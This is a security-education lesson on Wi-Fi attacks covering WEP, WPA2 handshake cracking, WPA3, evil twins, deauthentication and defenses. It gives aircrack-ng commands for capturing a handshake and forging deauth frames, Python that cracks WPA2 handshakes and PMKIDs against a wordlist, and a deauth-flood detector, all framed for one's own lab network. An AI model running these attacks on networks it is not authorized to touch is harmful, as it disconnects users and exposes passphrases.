BiTree

Live coding lessons for aspiring developers and security professionals.

[email protected]

(201) 785-7951

Mon–Fri, 9 AM–5 PM EST

© 2026 BiTree. All rights reserved.
50 min, Intermediate

Wireless Network Attacks

After this lesson, you will be able to: Explain 802.11 basics, why WEP is broken, WPA2's 4-way handshake and offline dictionary attacks, what WPA3 improves, evil twin and deauthentication attacks, and the defenses; capture and attack a WPA2 handshake in a lab you own.

Wi-Fi is a shared radio medium: anyone in range can receive every frame and transmit frames of their own, which exposes it to attacks wired networks do not face. This lesson covers 802.11 basics, the brokenness of WEP, WPA2's handshake and offline cracking, WPA3's improvements, evil twin and deauth attacks, and an aircrack-ng lab against a network you own.

Prerequisites: How Computers Talk: The Networking Foundation

ℹ️ Authorization first (and a hardware note)

Only attack Wi-Fi networks you own. Capturing or cracking handshakes on networks you do not control is illegal in most jurisdictions, and the deauthentication step transmits frames that disconnect real users, so confine it to your own AP and your own clients. This lab also requires physical hardware: a wireless adapter whose driver supports monitor mode and packet injection (aireplay-ng needs injection for the deauth step). Do it on your own home network with your own password.

802.11 basics

Wi-Fi devices find networks via beacon frames (the access point advertising its SSID, channel and supported security) and probe requests (clients asking for networks they already know, which is why a "hidden" SSID leaks as soon as a saved client probes for it), then authenticate and associate to join. Management frames (beacons, probes, authentication, association, deauthentication) coordinate all of this. In WPA2 and earlier they are sent in the clear with no integrity protection unless the optional 802.11w extension is enabled, which is the root of deauthentication attacks: any radio on the channel can transmit a management frame that claims to come from the AP. Understanding beacons, probes, and association explains both how you connect and how attacks manipulate that process.

WEP: completely broken

WEP was the original Wi-Fi encryption and is fatally flawed. It encrypts with RC4 under a key formed from the shared secret and a 24-bit initialization vector (IV) sent in the clear; with only about 16 million IVs, keystreams repeat quickly on a busy network, and statistical attacks on the RC4 key schedule (FMS, and the faster PTW attack used by aircrack-ng) recover the key from a few tens of thousands of captured IVs, in minutes. An attacker who does not want to wait for traffic can replay captured ARP packets to generate it. There is no safe way to use WEP; if you ever see it, treat the network as open. It exists in this lesson only so you recognize and retire it.

WPA2 and offline dictionary attacks

WPA2-PSK protects the network with a pre-shared key and establishes session keys through a 4-way handshake. The passphrase never goes over the air; both sides derive the Pairwise Master Key (PMK) from it as PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations), then mix the PMK with both MAC addresses and the two nonces exchanged in the handshake to get the session key (PTK). The client proves it knows the PTK by putting a MIC on handshake message 2. Everything except the PMK is visible in the capture, so an attacker who records the handshake (or just the PMKID that many APs include in the first handshake message, obtainable by associating even with no real client present) can run an offline dictionary or brute-force attack: each guess is run through the same derivation and checked against the captured MIC or PMKID, without touching the network. The 4096 PBKDF2 rounds are the only brake on the guess rate, and the SSID salt means precomputed tables only work per SSID. This is why a strong, unique, long Wi-Fi passphrase matters; a weak one falls in a wordlist.

WPA3, evil twins, and deauth

WPA3-Personal replaces the PSK exchange with SAE (Simultaneous Authentication of Equals, a password-authenticated key exchange): each guess now requires a live exchange with the AP, so the offline dictionary attack against a captured handshake no longer works, and the exchange adds forward secrecy, so a passphrase recovered later does not decrypt old sessions. Two caveats: early SAE implementations had side-channel weaknesses (the 2019 "Dragonblood" research), and WPA3 "transition mode" still accepts WPA2 clients, so a weak passphrase can be attacked through the WPA2 path until WPA2 is turned off. Evil twin attacks create a rogue access point with the same SSID as a legitimate network and lure clients to it, often by sending deauthentication frames to knock clients off the real AP first; against WPA2-PSK the rogue AP does not even need the passphrase, because the client's handshake message 2, computed against a nonce the attacker chose, is enough for an offline attack. Because WPA2 management frames are unauthenticated, anyone can forge a deauth with the AP's address as the sender and disconnect clients at will, which is also how attackers force a handshake capture.

Lab: capture and attack a WPA2 handshake (your own network)

Requires a monitor-mode adapter and your own AP. airodump-ng prints "WPA handshake: <bssid>" in its status line once it has seen the handshake messages; if that never appears, check that you are on the right channel and that a client actually reconnected.

  1. Put the adapter in monitor mode: airmon-ng start wlan0 (the interface usually becomes wlan0mon; run airmon-ng check kill first if NetworkManager or wpa_supplicant keeps grabbing the card).
  2. Find your network and channel: airodump-ng wlan0mon.
  3. Capture the handshake on your AP's channel: airodump-ng -c <ch> --bssid <your_bssid> -w cap wlan0mon.
  4. From a second terminal, force a reconnection so the handshake is re-sent: aireplay-ng --deauth 5 -a <your_bssid> wlan0mon (add -c <your_client_mac> to target one of your own clients instead of broadcasting). A client that negotiated 802.11w will ignore the forged frames.
  5. Crack the captured handshake against a wordlist (use a password you set): aircrack-ng -w rockyou.txt -b <your_bssid> cap-01.cap.
  6. Observe that a weak password cracks quickly and a long random one does not. Then read the defenses.
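What aircrack-ng does in step 5, and what the WPA2 section above describes, is the derivation below: PBKDF2 from passphrase and SSID to the PMK, PRF to the PTK, and an HMAC check against the MIC in handshake message 2 (or against a PMKID). This is an added example written for this lesson, not code from the page or from aircrack-ng. The SSID, passphrase, MAC addresses, nonces and wordlist are constructed here, and the "capture" is generated from a passphrase we already know; a real capture would come from the airodump-ng .cap file.

```python
import hashlib
import hmac
from typing import Optional

# Added example (not from the lesson or aircrack-ng): the key derivation that an
# offline WPA2-PSK attack repeats per guess. SSID, passphrase, MACs, nonces and
# wordlist are constructed for this lesson, not taken from a real capture.

PBKDF2_ROUNDS = 4096   # fixed by 802.11; the only brake on the guess rate
MIC_OFFSET = 81        # MIC field offset inside an EAPOL-Key frame


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes).
    The SSID is the salt, so precomputed tables are only valid per SSID."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(),
                               PBKDF2_ROUNDS, 32)


def ptk_from_pmk(pmk: bytes, ap_mac: bytes, sta_mac: bytes,
                 anonce: bytes, snonce: bytes) -> bytes:
    """PTK = PRF-384(PMK, "Pairwise key expansion", sorted MACs || sorted nonces).
    MACs and nonces are all visible in the capture; only the PMK is secret."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    out = b""
    for i in range(3):  # 3 x 20-byte SHA1 outputs cover the 48-byte CCMP PTK
        out += hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]),
                        hashlib.sha1).digest()
    return out[:48]  # KCK = PTK[0:16] is the part that signs the handshake


def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    """WPA2-CCMP MIC: HMAC-SHA1 over the frame with its MIC field zeroed, 16 bytes."""
    zeroed = eapol_frame[:MIC_OFFSET] + bytes(16) + eapol_frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def pmkid(pmk: bytes, ap_mac: bytes, sta_mac: bytes) -> bytes:
    """PMKID = HMAC-SHA1-128(PMK, "PMK Name" || AP MAC || STA MAC). An AP that
    includes it in message 1 hands over a check value with no client needed."""
    return hmac.new(pmk, b"PMK Name" + ap_mac + sta_mac, hashlib.sha1).digest()[:16]


def build_eapol_m2(snonce: bytes, mic: bytes = bytes(16)) -> bytes:
    """Minimal EAPOL-Key message 2 (client -> AP), 99 bytes, key data omitted."""
    body = (b"\x02"                    # descriptor type: RSN
            + b"\x01\x0a"              # key info: HMAC-SHA1 MIC, pairwise, MIC bit set
            + b"\x00\x10"              # key length 16 (CCMP)
            + (1).to_bytes(8, "big")   # replay counter
            + snonce + bytes(16) + bytes(8) + bytes(8)   # nonce, IV, RSC, key ID
            + mic
            + b"\x00\x00")             # key data length
    return b"\x01\x03" + len(body).to_bytes(2, "big") + body   # 802.1X: v1, EAPOL-Key


def crack_handshake(cap: dict, wordlist) -> Optional[str]:
    """Run each guess through the derivation and compare with the captured M2 MIC."""
    for guess in wordlist:
        pmk = pmk_from_passphrase(guess, cap["ssid"])
        kck = ptk_from_pmk(pmk, cap["ap_mac"], cap["sta_mac"],
                           cap["anonce"], cap["snonce"])[:16]
        if hmac.compare_digest(eapol_mic(kck, cap["m2"]),
                               cap["m2"][MIC_OFFSET:MIC_OFFSET + 16]):
            return guess
    return None


def crack_pmkid(cap: dict, wordlist) -> Optional[str]:
    """Same idea against a PMKID: one PBKDF2 plus one HMAC per guess, no nonces needed."""
    for guess in wordlist:
        pmk = pmk_from_passphrase(guess, cap["ssid"])
        if hmac.compare_digest(pmkid(pmk, cap["ap_mac"], cap["sta_mac"]), cap["pmkid"]):
            return guess
    return None


def make_capture(ssid: str, passphrase: str) -> dict:
    """Constructed stand-in for what the lab's airodump-ng step records:
    a handshake and a PMKID generated here from a passphrase we know."""
    ap_mac, sta_mac = bytes.fromhex("02aabbccdd01"), bytes.fromhex("02aabbccdd02")
    anonce, snonce = bytes(range(32)), bytes(range(32, 64))
    pmk = pmk_from_passphrase(passphrase, ssid)
    kck = ptk_from_pmk(pmk, ap_mac, sta_mac, anonce, snonce)[:16]
    m2 = build_eapol_m2(snonce, eapol_mic(kck, build_eapol_m2(snonce)))
    return {"ssid": ssid, "ap_mac": ap_mac, "sta_mac": sta_mac, "anonce": anonce,
            "snonce": snonce, "m2": m2, "pmkid": pmkid(pmk, ap_mac, sta_mac)}


WORDLIST = ["password", "letmein", "sunflower2019", "correcthorsebatterystaple"]
CAPTURE = make_capture("BiTreeLab", "sunflower2019")   # weak passphrase, on the list

if __name__ == "__main__":
    print("handshake ->", crack_handshake(CAPTURE, WORDLIST))   # sunflower2019
    print("pmkid     ->", crack_pmkid(CAPTURE, WORDLIST))       # sunflower2019
    strong = make_capture("BiTreeLab", "v8Qm-2kLp-rT9x-Ws4e-Zb7n")
    print("strong    ->", crack_handshake(strong, WORDLIST))    # None
```

Every guess costs one 4096-round PBKDF2, which is why the lab's weak password falls in seconds while the random one never matches anything in the list; a cracking tool on a GPU does exactly this, only in parallel. Note also that the check for the PMKID path uses nothing but the PMK and two MAC addresses, so an AP that emits PMKIDs can be attacked without waiting for any client to connect.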

Defenses

Use WPA3 where supported; SAE removes the offline-dictionary attack, but only once WPA2 transition mode is turned off. Enable 802.11w (Protected Management Frames): unicast deauthentication and disassociation frames are then encrypted with the session key and broadcast ones carry a keyed integrity check, so a forged deauth is discarded. That stops the deauth attack but does not by itself stop an evil twin; 802.11w is mandatory in WPA3 and optional (often off by default) in WPA2. For organizations, use WPA2/WPA3-Enterprise (EAP) with per-user credentials instead of a shared PSK, so one leaked password does not expose everyone, and configure clients to validate the RADIUS server's certificate, which is what actually defeats an evil twin. Monitor for deauth floods and for rogue APs advertising your SSID. And regardless of protocol, use a long, unique passphrase that no wordlist contains.
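The deauthentication frame discussed in the evil twin and deauth section is small enough to build by hand, and doing so shows why the "monitor for deauth floods" advice above is a rate check rather than an address check: a forged frame carries the AP's own MAC, so nothing in it distinguishes attacker from AP without 802.11w. The following is an added example written for this lesson, not code from the page or from aircrack-ng; the MAC addresses and the frame trace it analyses are constructed, and a real detector would read frames from a monitor-mode capture instead.

```python
import struct
from typing import Optional

# Added example (not from the lesson or aircrack-ng): a raw 802.11
# deauthentication frame built and parsed, and a rate-based detector for deauth
# floods. The MAC addresses and the frame trace are constructed for this lesson.

DEAUTH_FC = 0x00C0        # frame control: protocol 0, type 0 (mgmt), subtype 12 (deauth)
PROTECTED_BIT = 0x4000    # frame-control "Protected Frame" flag; set on 802.11w deauths
REASON_CLASS3 = 7         # "class 3 frame received from nonassociated STA"


def mac_to_bytes(mac: str) -> bytes:
    return bytes.fromhex(mac.replace(":", ""))


def build_deauth(bssid: str, target: str = "ff:ff:ff:ff:ff:ff",
                 reason: int = REASON_CLASS3, seq: int = 0) -> bytes:
    """24-byte management header plus a 2-byte reason code. Without 802.11w no
    field is keyed, so an attacker simply writes the AP's address into addr2/addr3."""
    header = struct.pack("<HH6s6s6sH",
                         DEAUTH_FC, 0,            # frame control, duration
                         mac_to_bytes(target),    # addr1: receiver (broadcast hits everyone)
                         mac_to_bytes(bssid),     # addr2: claimed transmitter
                         mac_to_bytes(bssid),     # addr3: BSSID
                         seq << 4)                # sequence control (fragment 0)
    return header + struct.pack("<H", reason)


def parse_deauth(frame: bytes) -> Optional[dict]:
    """Return addresses and reason code of a deauth frame, or None for any other frame."""
    if len(frame) < 26:
        return None
    fc, _duration, a1, a2, a3, _seq = struct.unpack("<HH6s6s6sH", frame[:24])
    if fc & 0x00FC != DEAUTH_FC:          # compare type/subtype bits only
        return None
    (reason,) = struct.unpack("<H", frame[24:26])
    return {"dst": a1.hex(":"), "src": a2.hex(":"), "bssid": a3.hex(":"),
            "reason": reason, "protected": bool(fc & PROTECTED_BIT)}


def deauth_flood_sources(frames, window_s: float = 1.0, threshold: int = 10) -> dict:
    """frames: iterable of (timestamp_seconds, raw_frame). Returns {src: peak_count}
    for every source that sent more than `threshold` deauths inside any sliding
    window of `window_s`. Spoofed frames carry the AP's own address, so the
    signal is the rate, not the sender."""
    times_by_src = {}
    for ts, raw in frames:
        parsed = parse_deauth(raw)
        if parsed is not None:
            times_by_src.setdefault(parsed["src"], []).append(ts)
    flagged = {}
    for src, times in times_by_src.items():
        times.sort()
        start, peak = 0, 0
        for end, t in enumerate(times):
            while t - times[start] > window_s:
                start += 1
            peak = max(peak, end - start + 1)
        if peak > threshold:
            flagged[src] = peak
    return flagged


def sample_trace():
    """Constructed trace: one ordinary deauth from the AP to a single client, one
    beacon the parser must ignore, then 40 forged broadcast deauths in half a second."""
    ap, sta = "02:aa:bb:cc:dd:01", "02:aa:bb:cc:dd:02"
    trace = [(0.0, build_deauth(ap, sta, reason=2))]       # 2 = previous auth no longer valid
    trace.append((0.1, bytes.fromhex("8000") + bytes(24)))  # beacon: subtype 8, not a deauth
    trace += [(1.0 + i / 80, build_deauth(ap, seq=i)) for i in range(40)]
    return trace


if __name__ == "__main__":
    print(parse_deauth(build_deauth("02:aa:bb:cc:dd:01")))
    print(deauth_flood_sources(sample_trace()))   # {'02:aa:bb:cc:dd:01': 40}
```

The single deauth at the start of the trace is normal AP behaviour and is not flagged; the burst is. With 802.11w enabled the forged frames would arrive with the Protected Frame bit clear (the attacker has no key to set it meaningfully) and clients would drop them, but a detector still sees the burst on the air, which is why monitoring remains useful even after PMF is on.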

Quick Check

Why does a long, random WPA2 passphrase matter even though WPA2 itself is not 'broken' like WEP?


Common mistakes only experienced testers catch

  • Using an adapter that does not support monitor mode or packet injection (or a driver that silently falls back) and wondering why nothing captures.
  • Attacking a neighbor's network and committing a crime.
  • Believing WPA2 is unbreakable: the protocol holds, but the offline attack reduces it to the strength of the passphrase.
  • Forgetting 802.11w, leaving deauth attacks trivial.
  • Assuming hiding the SSID is security (it is not; clients' probe requests reveal it).
  • Reusing one PSK across an entire organization instead of Enterprise EAP.
